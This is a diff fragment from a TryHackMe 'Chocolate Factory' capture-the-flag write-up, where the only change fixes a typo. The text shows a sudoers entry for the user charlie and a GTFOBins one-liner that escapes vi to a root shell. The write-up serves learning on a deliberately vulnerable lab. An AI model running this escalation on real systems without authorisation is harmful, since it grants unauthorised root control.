0xNirvana/Writeups/TryHackMe/Easy/chocolateFactory/chocolatefactory.md

     (ALL : !root) NOPASSWD: /usr/bin/vi
 ```

-It can be seen that "charlie" can run `/usr/bin/vi` with `sudo` privlege.
+It can be seen that "charlie" can run `/usr/bin/vi` with `sudo` privilege.
 So, we can head over to [GTFOBins](https://gtfobins.github.io/gtfobins/vi/) and use the command mentioned over there to gain access as `root` using the `/usr/bin/vi` command.

 ```bash
 charlie@chocolate-factory:/$ sudo vi -c ':!/bin/sh' /dev/null